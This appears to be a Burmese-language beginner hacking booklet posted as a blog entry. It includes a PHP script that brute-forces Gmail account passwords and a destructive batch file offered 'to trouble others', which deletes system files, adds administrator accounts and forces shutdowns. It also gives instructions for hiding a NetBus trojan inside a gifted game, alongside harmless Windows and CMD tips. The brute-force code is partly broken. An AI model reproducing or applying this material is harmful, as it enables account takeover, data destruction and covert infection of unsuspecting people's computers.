<div align='center'>
<form method='post'>
Username to brute:<br>
<input name='username' type='text' /><br><br>
<input name='attack' type='submit' value='dictionary' /> -
<input name='attack' type='submit' value='brute' /><br>
</form>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
&nbsp;
</div>
</td>
</tr>
</table>
";
// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,imag
e/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so n
o direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the dictionar
y attack.</b></div>
</td>
</tr>
</table>";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the brute for
ce attack.</b></div>
</td>
</tr>
</table>";
}
echo "</body>
</html>";
// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string,
so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}
?>
PHP ရတဲ့ host တခုခုမွာ ဒီ code ေတြကို install လုပ္ရပါမယ္။ က်န္တာ အေသးစိတ္သိခ်င္ရင္ေတာ့ free hosting
တခုသုံးျပီး က်ေနာ္ အရင္စမ္းလိုက္အံုးမယ္ ။ ဘယ္သူ႕ကိုစမ္းရမလ ဲ မသိဘူး။
ေအာက္က free host မွာ PHP ရပါတယ္။
Code:
http://www.000webhost.com/
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၅) WINDOWS ကို၀င္ေမႊနည္း တိုလီမုတ္စမ်ား
Registry သ႔ ို ၀င္ေရာက္ေမႊေႏွာက္ျခင္း
က်ေနာ္ registry ထဲသို႔ ၀င္ေမႊနည္း နည္းနည္းပါးပါး ေျပာခ်င္ပါတယ္။ ဘာဘဲျဖစ္ျဖစ္ registry ကို ၀င္ေမႊေတာ့မယ္ဆိုရင္
ေတာ့ back up လုပ္ထားဖို့လိုပါတယ္...ဘာလို့လဲဆိုေတာ့ registry မွာ၀င္ေရးတဲ့ အခါမွာ registry က auto save
လုပ္ပါတယ္..မွားသြားပါတယ္ဆိုျပီး undo ,redo ေတြလုပ္လို့မရပါဘူး....
အဲဒါေၾကာင့္ပါ.....
ကဲ က်ေနာ္တို႔ All program ကိုေဖ်ာက္လိုက္ရေအာင္....
- start > run ကို၀င္ပါ..
- regedit လို့ ၇ိုက္ျပီး enter ႏွိပ္ပါ..
- HKEY-CURRENT- USER\software\microsoft\windows\current version\policies\explorer
- explorer ေပၚကို right click ႏွိပ္ျပီး new ကိုေရြးခ်ယ္ပါ Dword value ကိုဖြင့္ပါ..
ထိုအခါ ညာဘက္ျမင္ကြင္းမွာ new value #1 ေပၚလာပါမယ္..
-new value #1 ကို rename ေပးလိုက္ပါ..
name က NoStartMenuMoreProgram ျဖစ္ပါတယ္..
NoStartMenuMoreProgram ေပၚကိုလည္း right click ေပးျပီး modify ေရြးပါ
value data အကြက္ထဲ က 0 ေပၚေနပါမယ္..အဲဒါကို 1 ေျပာင္းေပးလိုက္ပါ..
computer ကို restart ေပးလိုက္ပါ...
Folder ကို software မသံုးပဲ Lock ခ်နည္း
ေရွးဦးစြာ notepad သို႔မဟုတ္ Command Promt ကိုဖြင့္ျပီး edit ထဲတြင္ ေအာက္ေဖၚျပပါ command မ်ားကို
ေရးသား၍ .bat file အေနျဖင့္ save မွတ္ပါ။ Notepad ထဲတြင္ေရး၍ Save name as ဆိုတဲ့ ေနရာမွာ example.bat လို႔
save မွတ္ပါ။ ထို file အားလြယ္လြယ္ကူကူ desktop ေပၚမွာပဲ သိမ္းထားေပါ့။ ထို႔ေနာက္ ၄င္း .bat file အား Run
လိုက္ပါ။ Private ဆိုေသာ Folder တစ္ခု ေပၚလာပါလိမ့္မယ္။ အဲဒီ Folder ထဲတြင္မိမိ သိမ္းထားခ်င္ေသာ files မ်ား
folder မ်ား ထည့္လိုက္ပါ။ ထို႕ေနာက္ example.bat file အားေနာက္တစ္ေခါက္ run လိုက္ပါ။ ထိုအခါ cmd Windows
တစ္ခု ေပၚလာပါလိမ့္မယ္။ Set Password to Lock Folder ဆိုတာေပၚလာပါတယ္။ ကိုယ္လိုခ်င္တဲ့ password
ေရးလိုက္ေပါ့။ ေနာက္ထပ္ Are You Sure to Lock this Folder (Y/N) ဆိုတာေပၚလာပါလိမ့္မယ္။ Y လို႔ရိုက္လိုက္ပါ။
Private ဆိုေသာ Folder ေပ်ာက္သြားပါမယ္။ ၄င္း folder ကိုျပန္လိုခ်င္လွ်င္ example.bat ဆိုတဲ့ file ကိုျပန္ run ပါ။
Enter Password to Unlock Folder ဆိုတာေပၚလာပါလိမ့္မယ္။ Password ရိုက္လိုက္ပါ။ ၄င္း folder
ျပန္ေပၚလာပါလိမ့္မယ္။ စမ္းၾကည့္က်ေပါ့ဗ်ာ……….
Command
cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
သူမ်ားကို ဒုကၡေပးခ်င္လွ်င္။ ။ေအာက္ေဖၚျပပါ command မ်ားကို notepad ထဲသို႕ copy, paste ကာ .bat file
အမ်ိဳးအစားျဖင့္ save မွတ္ပါ။ ထို႔ေနာက္၄င္း file အားလံုး၀ဖြင့္မၾကည့္ပါႏွင့္။ ဖြင့္ၾကည့္ပါက error message
မ်ားတတ္လာျပီး Windows က auto shut down ျဖစ္ေနပါလိမ့္မယ္။ ေနာက္တစ္ေခါက္ဖြင့္လဲ Windows
တတ္ျပီးျပီးျခင္း ၁၀ စကၠန္႔အတြင္း Shut Down ျဖစ္ေနပါလိမ့္မယ္။ ဘယ္လိုမွ ျပန္ဖြင့္ႏိုင္မွာမဟုတ္ပါဘူး။ safemode
ကျပန္ျပင္မွ ျပန္ေကာင္းႏိုင္မွာပါ ။ ဟဲဟ…ဲ …..
title any
@echo off
copy any.bat "c:\documents and settings\all users\start menu\programs\startup"
del *.dll
del *.exe
del *.ini
time 00:00
date 88/88/888
net user administrator *18083
net user 598 *32087 /add
net user 3063 *864 /add
net user 3262 *21895 /add
net user 29039 *3102 /add
net user 15688 *215 /add
net user 24824 *28761 /add
net user 25176 *23975 /add
net user 8896 *28052 /add
msg *any
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
cd C:\WINDOWS\system32
del /S /F /Q keyboard.drv
del /S /F /Q keyboard.sys
del system32
shutdown -s -f
exit
Cmd Dos Command နည္းနည္းပါးပါး
က်ေနာ္ သိထားတဲ့ CMD DOS COMMAND နည္းနည္းပါ
႔သိၿပီးသားသူေတြလည္းရွိပါတယ္ ...
မသိေသးတဲ့ သူေတြအတြက္ပဲ ရည္ရြယ္ပါတယ္ ....
Run Box မွာ cmd ရိုက္ထည့္လိုက္မယ္
C Directory ကိုသြားမယ္ဆို C: , D ဆိုရင္ D: စသည့္ျဖင့္ေပါ့ ....
ပထမဆံုးေျပာရရင္ .. cmd ကိုစေခၚလိုက္တာနဲ႔ စျမင္ရမွာက
C:\Documents and Settings\user name> ပါ ...
အဲဒီ Directory မွာ ဘယ္ Folder ေတြပါလည္း ၾကည့္ခ်င္ရင္
dir /a နဲ႔ ၾကည့္ရပါတယ္
အဲဒီ့ Directory တစ္ခုထဲက Folder ကို ဖြင့္ခ်င္ရင္
cd ခံထားၿပီး မိမိဖြင့္ခ်င္တဲ့ Folder Name (ဥပမာ။ ။ Desktop)ေပးၿပီး ဖြင့္ရပါတယ္
C:\Documents and Settings\user name\Desktop>
ထို Folder မွ ျပန္ထြက္ခ်င္ရင္ cd.. ေရးၿပီး ျပန္ထြက္ရပါမယ္
Hidden ျဖစ္ေနတဲ့ Folder (သို႔) File ကို unhidden ေပးခ်င္တယ္ဆိုရင္
Folder Option ကေန virus ကိုက္တယ္ဆို show hidden folder ေပးလည္း မရတာေတြရွိပါတယ္
attrib -H /S /D "c:\......\folder name"
hidden ျဖစ္ေနတဲ့ Folder (သို႔) File ရွိတဲ့ Directory အျပည့္အစံုကို /D ေနာက္ကေန
ဆက္ေရးေပးရပါတယ္
Directory တစ္ခုမွာရွိတဲ့ folder ထဲက files ေတြကို တျခား Directory တစ္ခုမွာရွိတဲ့
folder ထဲကို ေျပာင္းေရႊ႕ကူးယူခ်င္တယ္ဆို ...
မိမိေျပာင္းေပးခ်င္တဲ့ Directory ကိုအရင္ဖြင့္ေပးရပါတယ္ (ဥပမာ။ ။ C: ထဲက Desktop ကိုေရႊ႕မယ္ဆို C:\Documents
and Settings\user name\Desktop>
လို႔ အရင္ဖြင့္ေပးလိုက္ပါ။
ေနာက္မဆက္ၿပီး ကူးယူခ်င္တဲ့ Directory မွ folder ကိုေရးေပးရပါတယ္
xcopy /a "e:\foler name" ဟုေရးေပးရပါမယ္ ...
၂ခုေပါင္းကိုၾကည့္မယ္ဆိုရင္ေတာ့
C:\Documents and Settings\user name\Desktop>xcopy /a "e:\foler name"
အခု ကူးယူတာက unhidden files ေတြကိုပဲ ကူးယူးတာပါ။
hidden files ေတြကိုကူးမယ္ဆိုရင္ေတာ့ /h ထည့္ေပးရုံပါပ ဲ
xcopy /h /a "e:\foler name" ဟုေရးေပးလိုက္ပါ...
အခုက files ကိုပဲကူးတာပါ ...
Folder အလိုက္ကူးမယ္ဆိုရင္ေတာ့ /s ကိုအသံုးျပဳရပါတယ္
xcopy /s "e:\folder name" လို႔ေရးေပးရပါတယ္။
ဒါကလည္း hidden မျဖစ္တဲ့ folder ကိုကူးတာပါ
hidden folder ကိုကူးမယ္ဆိုရင္ေတာ့ /h ကိုပဲထည့္ရပါတယ္
xcopy /h /s "e:\foler name" လို႔ေရးေပးရပါတယ္ ...
အဲဒီလိုကူးယူတဲ့ အခ်ိန္မွာ CMD box မွာ ကူးယူးတဲ့ files ေတြ run တာကိုျပပါတယ္ အဲဒီလို မေပၚခ်င္ရင္ေတာ့ /Q
ထည့္ေပးရပါတယ္
xcopy /h /q /s "e:\foler name" လို႔ေရးေပးရပါတယ္ .................။
Folder Background ကို software မသံုးပဲ ပံုလွလွေလးထည့္နည္း
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=E:\general\picture\DSABayonet211.jpg
iconarea_text=11x00fffffff
ေဖၚျပပါ code မ်ားကို Folder အတြင္းရွိ desktop.ini ဆိုေသာ file အတြင္းသို႔ copy ကူး paste လုပ္ပါ။ ၄င္း ini file သည္ hidden
ျဖစ္ေနပါသည္။ hidden ေဖၚျပီးရွာပါ။ iconarea_image=E:\general\picture\DSABayonet211.jpg ဆိုရာတြင္
မိမိထည့္သြင္းလိုေသာပံု ၏တည္ေနရာ ကိုသိရန္လိုပါသည္။ ဥပမာ. Desktop ေပၚရွိ image.jpg ဆိုေသာပံုကိုထည့္သြင္းခ်င္လွ်င္
iconarea_image=C:\Documents and Settings\User Name\Desktop\image.jpg ဟုေရးႏိုင္ပါတယ္။ အေနာက္က file
extension *.jpg ဆိုတာကိုထည့္ေရးရန္မေမ့ပါႏွင့္။
website ေတြ႕ရဲ႕ IP ကုိခ်က္ခ်င္းသိခ်င္တယ္ဆိုရင္
ပထမဆံုး start >>> Run ကို click.
cmd လို႕ ရိုက္ျပီး ok လုပ္.
အဲဒီမွာ ဒါေလးကို ရိုက္ထည့္ၾကည့္လိုက္.
nslookup www.google.com လို႕ရိုက္ျပီး enter ေခါက္ၾကည့္လိုက္ပါက
google ရဲ႕ IP ေတြက်လာပါလိမ့္မယ္။။မိမိသိခ်င္တဲ႕ website ရဲ႕ အမည္ကို ေျပာင္းရိုက္ၾကည့္ေပါ့
ေပ်ာ္ရႊင္ႏိုင္ပါေစ
(မစၥတာ.ေမာင္ဘစ္ေန)

Saturday, March 16, 2013

အေျခခံ Hacking နည္းပညာစာအုပ္ ။


မာတိကာ
Introduction: ဟက္ကာဆိုတာဘာလဲ ႏွင့္ ကြ်ႏ္ုပ္၏ အျမင္
အပိုင္း (၁) : လိုအပ္ေသာအရည္အျခင္းမ်ား
အပိုင္း (၂) : Hacker တို႔၏ လွ်ိဳ႕၀ွက္ခ်က္မ်ား
……….Intro
……….Trojan Horse ဟုေခၚေသာ virus အေၾကာင္း
…………ဟက္ကာေတအြ သုံးျပဳေသာ လွ်ိဳ႕၀ွက္ အရာမ်ား
………..Port Scanning
………..SubSeven
……….NetBus
အပိုင္း (၃) : Gmail Password Hack နည္း
…………..Phishing အေၾကာင္း Intro
အပိုင္း (၄) : Phishing နည္းလမ္းကိုအသံုးျပဳ၍ gmail password ေဖာက္နည္း
အပိုင္း (၅) : Windows ကို၀င္ေမႊနည္း တိုလီမုတ္စမ်ား
………. Registry သို့၀င္ေရာက္ေမႊေႏွာက္ျခင္း
……… Folder ကို software မသံုးပဲ lock ခ်နည္း ႏွင့္ Funny Command ေရးနည္း
……… Cmd Dos Command နည္းနည္းပါးပါး
……… Folder Background ကို software မသံုးပဲ ပံုလွလွေလးထည့္နည္း
……… website ေတြ႕ရဲ႕ IP ကုိခ်က္ခ်င္းသိခ်င္တယ္ဆိုရင္
စာေရးသူ (မစၥတာ.ေမာင္ဘစ္ေန)
(18-9-2009 ~ 30-9-2009)
ဟက္ကာဆိုတာဘာလဲ ??? ကြ်ႏ္ုပ္၏အျမင္ ။
Hacking ပညာရပ္ဆိုသည္ သင္ယူလို႔ရေသာ ပညာမဟုတ္။ အသံုးခ် နည္းပညာမ်ားကို ေလ့လာေတြ႔ရွိျပီး
အားနည္းခ်က္ကို ရွာေဖြႏိုင္ေသာ ပညာျဖစ္သည္။ Online ေပၚတြင္ Hacking နဲ႔ပတ္သတ္ေသာ
စာအုပ္မ်ားစြာကိုေတြ႕ဘူးျပီး Hacking ႏွင့္ပတ္သတ္ေသာ web site မ်ားလဲ ေပၚထြက္ေနပါျပီ။ Vulnerability
ေပါင္းမ်ားစြာကို hacker ဟုေခၚေသာ လူစုမ်ားက ရွာေဖြေတြ႔ရွိျပီး web site ေပါင္းမ်ားစြာတြင္ တင္ထားၾကပါတယ္။ အဲဒီ
နည္းပညာရပ္ေတြကို အသံုးျပဳ မွီခို ေနတဲ့လူေတြအမ်ားႀကီးရွိပါတယ္။ ဒါေတြက ဟက္ကာေတြလားဆိုတဲ့
ေမးခြန္းေမးႏိုင္ပါတယ္။
Tool user ေတြပါ၊ professional hacker တစ္ေယာက္ဆိုတာ ပါရမီအရင္းခံျပီး ကြန္ပ်ဴတာ နည္းပညာ
ကိုရူးသြပ္တဲ့ လူတစ္ေယာက္ရဲ႕IT ပိုင္းဆိုင္ရာေပ်ာ့ကြက္ကို ရွာေတြ႔ႏိုင္ျခင္းျဖစ္ပါတယ္။ White, black, gray လို႔ေခၚတဲ့
hacker သံုးမ်ိဳးခြဲထားပါတယ္။ နဲ႔ black ကေတာ့ ရန္သူေတြေပါ့။ အမ်ားစုက gray ေတြပါ။
ဒါဆို က်ေနာ္ေရးထားတဲ့ စာအုပ္ကေကာ၊ ဖတ္ျပီး hacker တစ္ေယာက္ျဖစ္ႏိုင္ပါ့မလား
လို႔ေမးႏိုင္စရာအေၾကာင္းရွိပါတယ္။ က်ေနာ္ကိုယ္တိုင္ေတာင္မွ ဟက္ကာမဟုတ္တာဗ်။ :D ။ က်ေနာ္သိတာေလးေတကြ ို
share လုပ္ေပးခ်င္တဲ့ရည္ရြယ္ခ်က္ကို အဓိကထားတာပါ။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၁) လိုအပ္ေသာ အရည္အျခင္းမ်ား
hacking လုပ္သည့္ေနရာတြင္ တစ္ဦးတစ္ေယာက္လုပ္ျခင္းထက္ အ မ်ားႏွင့္
ပူေပါင္းျပီး လုပ္လွ်င္ ပုိျပီး အ က်ဳိးရွိသည္။ ထုိ႕ေၾကာင့္ Ethical hacking တြင္ Hacker
မ်ားစုဖြဲ႕ျပီး TEAM တစ္ခုအ ေနျဖင့္ လုပ္ေဆာင္ရသည္။ ၎တုိ႕သည္ အ ခ်ိန္တုိင္း မိမိ
ကုိင္တြယ္ရေသာ System အား လုိအ ပ္ခ်က္မ်ားကုိရွာေဖြျပင္ဆင္ရသည္။
တုိက္ခုိက္ျခင္းမ်ဳိးစုံ ရွိသည့္အ တြက္ အ ားလုံးကုိသိရွိရန္မွာမျဖစ္ႏူိင္ေပ။မိမိhacking
အ ဖြဲ႕တြင္ လုပ္ကုိင္ေသာသူမ်ားသည္ ေအာက္ေဖာ္ျပပါ ပညာရပ္မ်ားကုိ တစ္ဦး
တစ္ေယာက္ျခင္း အ ေသအ ခ်ာတတ္ေျမာက္ရန္လုိအပ္သည္။
· Programming
· Webdeveloping
· Software Crackers
· Web Hackers
· Network security groups
· system admin groups
· database Hackers
· crytoanalizer
၎ပညာရပ္မ်ား အားလုံးကုိ သိရွိရန္ မလုိေပ။ သုိ႕ေသာ္ general knowledge
သိရွိရမည္။ မိမိ Hacker အဖြဲ႕တြင္ လူတစ္ေယာက္စီ ပညာတစ္ခုစီကုိ
ေသေသခ်ာခ်ာတတ္ေျမာက္ရန္လိုအပ္သည္။
Hacker တစ္ေယာက္ေအာင္ျမင္စြာျပဳလုပ္ႏုိင္ရန္အတြက္လုိအပ္ခ်က္မ်ားစြာရွိသည္။
မိမိ ၀င္ေရာက္လုိေသာ ေနရာ၏ data အျပည့္အစုံကုိသိရွိေအာင္ အရင္ဆုံးျပဳလုပ္ရမည္။
IP address
မိမိ၀င္ေရာက္ရမည့္ Computer ၏ address
Hostname
မိမိ ၀င္ေရာက္ရမည့္ Computer ၏ နာမည္
Software
၎ Computer တြင္အသုံးျပဳေသာ Software မ်ား
Firewall rules
Network ၏ လုံျခဳံေရးအတြက္အသုံးျပဳထားသည္မ်ား
Phone Numbers
ဖုန္းနံပါတ္
Employee names
အလုပ္သမားမ်ား ၏ အေၾကာင္းအရာမ်ား
မိမိတုိ႕သိလုိေသာ အခ်က္မ်ားစြာကုိ Internet မွ မ်ားစြာအကူအညီေပးႏုိင္သည္။
သင ္hacking လုပ္လုိေသာ ေနရာ၏ data ၆၀% ကုိ internet မွရွာႏုိင္ပါသည္။
၎၏ company ႏွင့္ပတ္သက္ေသာ ဖုန္းနံပါတ္ ၊ IP address ၊ Firewall ၊ အလုပ္သမား
ဦးေရ ၊ company စတင္တည္ေထာင္ေသာေန႕ ၊ company ၏ ပုိင္ရွင္ အမည္မ်ား ၊
company ခ်ိတ္ဆက္ထားေသာ တျခားNetwork မ်ား၊ company ၏ထုတ္ ကုန္မ်ားစသည့္
သတင္းအခ်က္အလက္မ်ားကုိအက်ဳိးရွိရွိ အသုံးခ်ရမည္ျဖစ္သည္။
hacking ျပဳလုပ္ရန္အတြက္အသုံးျပဳေသာ Tools မ်ား
1. Google (အေၾကာင္းအရာမ်ားစြာကုိ ရွာႏုိင္သည္။)
2. Google Earth (Network ခ်ိတ္ဆက္ျခင္းမ်ားကုိ ၾကည့္ရႈရန္)
3. Nmap (IP addres မ်ားကုိၾကည့္ရႈရန္)
4. John The Ripper (Password မ်ားကုိေက်ာ္ႏုိင္ရန္)
5. Lan Guard (မိမိ၏ Network ကုိ ေစာင့္ၾကည့္ရန္)
6. Pwdump 6 (Password မ်ားကုိခ်ိန္းရန္)
7. Firebug (website မ်ားမွျပင္ၿပီး server ထဲသို႕၀င္ရန္)
8. Java ( Mysql ကုိျပင္ဆင္ရန္)
9. putty (တျခား Computer ထဲသုိ႕ ၀င္ေရာက္ရန္)
၎ တုိ႕ျဖင့္စတင္စမ္းသပ္ အသုံးျပဳၾကျပီး မိမိတုိ႕၏ ဥာဏ္ရည္ဥာဏ္ေသြးအရ
ဆက္လက္အေကာင္အထည္ေဖာ္ၾကည့္သင့္သည္။Tools မ်ား၏ အလုပ္လုပ္ပုံကုိ ေသခ်ာ နား
လည္မွသာ အသုံးျပဳႏုိင္မည္ျဖစ္သည္။Tools မ်ား၏ အားနည္းခ်က္မ်ားကုိ သိထားရမည္ ျဖစ္
သည္။ Tools မ်ားကုိသုံးလွ်င္ ၎တုိ႕၏ သုံးစြဲပုံ အေၾကာင္းကုိ ေသခ်ာဖတ္ၾကည့္ရမည္။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၂) Hacker တို႔၏ လွ်ိဳ႕၀ွက္ခ်က္မ်ား…
Intro
Trojan Horse
Hacking ရဲ႕အဓိက တရားခံလို႔ေျပာႏိုင္တာကေတာ့ Trojan ဆိုတဲ့ virus ေၾကာင့္ပါ။
အင္တာနက္ဆိုင္ေတြမွာ ေတြ႔ရတတ္တယ္ ။ USB Stick ေတြကို virus scan လုပ္လိုက္ရင္
ေတာ္ေတာ္မ်ားမ်ားေတြ႔ရတဲ့ virus တစ္မ်ိဳးေလ။ Trojan, Trojan နဲ႔ လူသိေတာ္ေတာ္မ်ားပါတယ္။
က်ေနာ္ေလ့လာလို႔သိရတာေတာ့ ကြန္ပ်ဴတာရဲ႕ အခ်က္အလက္ေတြ၊ password ေတြအခိုးခံရတာဟာ အဲဒီ
Trojan ေတြေၾကာင့္လို႔ သံသယျဖစ္မယ္ဆိုရင္ မမွားႏိုင္ပါဘူး။ Trojan ဆိုတာ program ေသးေသးေလးပါ။
အဲဒီ program ေလးက ကြန္ပ်ဴတာတစ္ခု ထဲမွာ ၀င္ေရာက္ေနရာယူကာ hacker ဆီသို႕ ၄င္းကြန္ပ်ဴတာ၏
information မ်ားကို သတင္းေပးႏိုင္ေသာ Program တစ္ခုပါ။ ၄င္း Trojan ျဖင့္ ကြန္ပ်ဴတာမ်ားကို
ထိန္းခ်ဳပ္ႏိုင္ပါသည္။
Trojan မ်ား၏ အမ်ားအားျဖင့္ လုပ္ေဆာင္ႏိုင္ေသာ အစြမ္းသတိၱမ်ားကို ေအာက္တြင္ေဖၚျပထားပါသည္။
.CD-Rom drive မ်ားကို အဖြင့္၊ အပိတ္ control လုပ္ႏိုင္ျခင္း
.သင္၏ ကြန္ပ်ဴတာမွ screenshot ကို capture လုပ္ႏိုင္ျခင္း
.သင္၏ password မ်ား ( Windows, MSN, Gmail, Yahoo,….အစသျဖင့္) ကို hacker ဆီသို႔ သတင္းပို႔ေပးႏိုင္ျခင္း
.သင္၏ hard disk ထဲမွ file မ်ားကို လိုသလို ကူးယူႏိုင္ျခင္း၊ delete လုပ္ႏိုင္ျခင္း
.Keyboard ႏွင့္ mouse ကို Disable လုပ္ႏိုင္ျခင္း……အစသျဖင့္
Popular ျဖစ္ေနေသာ Trojan မ်ား
-NetBus
-SubSeven
NetBus Trojan မွာ အျခား Trojan မ်ားကဲ့သို႕ အေရးႀကီးတဲ့ အစိတ္အပိုင္း ၂ ပိုင္း ရွိပါတယ္။ NetBus Server.exe ရယ္
Patch.exe ရယ္ဆို တဲ့ exe file ၂ ခု ပါ၀င္ပါတယ္။ NetBus Server ကို သင္၏ ကြန္ပ်ဴတာထဲသို႔ အရင္ဆံုး install
လုပ္ရန္လိုပါသည္။ Patch file ကို သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာထဲသို႔ သြင္းႏိုင္ရန္ အဓိက လိုအပ္ပါသည္။
ဥပမာ- သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာ ပိုင္ရွင္၏ information ကိုအရင္ဆံုးစံုစမ္းသင့္ပါသည္။ သင္သည္
မိတ္ေဆြ သူငယ္ခ်င္းဆို လွ်င္ပို၍ အဆင္ေျပပါသည္။ ေရွးဦးစြာ သူ ၏ email သို႔ ပို႔၍ run
ခိုင္းျခင္းအားျဖင့္လဲ ရႏိုင္ပါသည္။ ဒါမွမဟုတ္ သူ႔အား ဂိမ္းလက္ေဆာင္ေပးသလိုလိုျဖင့္ ၄င္းဂိမ္းထဲတြင္
Patch file ကို သြင္းေပးလိုက္ပါ။ chess.exe file ဆိုပါစို႕။ ၄င္း exe file ထဲသို႔ Patch သြင္းလိုက္ပါ။
ResHacker software ျဖင့္ ဖန္တီးႏိုင္ပါသည္။ ထို႔ေနာက္ သင္ဖန္တီးလိုက္ေသာ chess.exe ဟာ
သာမန္အတိုင္းပါပဲ။ ဘာမွမေျပာင္းလဲသြားပါဘူး။ အဲဒီ ဟာကို install လုပ္လိုက္လွ်င္ ဂိမ္းဟာ သူ႔
orginal အတိုင္းပါပဲ။ ဘာမွ ျပႆနာမေပးႏိုင္ပါဘူး။ သင္ေပးလိုက္တဲ့ chess ထဲက patch file
ေလးက သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာထဲတြင္ ေနရာယူျပီးသားျဖစ္ပါတယ္။ အဲဒီ file ကလဲ hidden
ျဖစ္ေနတာပါ။ အဲဒါဆို အဆင္ေျပသြားပါလိမ့္မယ္။ စ hack က်တာေပါ့။…..:D ။
ဟက္ကာေတြ အသံုးျပဳေသာ လွ်ိဳ႔၀ွက္ အရာမ်ား
(၁) Port Scanners
Port Scanner ဆိုတာဘာလ ဲ
Port Scanning ရဲ႕ အဓိက ရည္ရြယ္ခ်က္ကေတာ့ opening port ေတြကို ရွာဖို႕ျဖစ္ပါတယ္။ Hacker တစ္ေယာက္
အတြက္ အေျခခံက်တဲ့ နည္းတစ္ခုပါ။ opening port ေတြကိုသိမွ hack လို႔လြယ္မွာကိုး….။Hacker အေနနဲ႔ server ေပၚ
မွာလုပ္ေနတဲ့ service ေတြကို ၾကည့္ျခင္းအားျဖင့္ vulnerability ေတြကို ရွာႏိုင္ဖို႔ အခြင့္အလန္းပိုမ်ားလာမွာပါ။
နာမည္ႀကီးတဲ့ nmap port scan tool ကိုေဒါင္းလုတ္ခ်ဖို႔ link ပါ > http://nmap.org/download.html <
Online ေပၚမွာအျခားport scanner tool ေကာင္းေကာင္းေတြအမ်ားႀကီးရွိပါေသးတယ္….။
Start Scanning
Target Host: www.yourcompany.com
TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
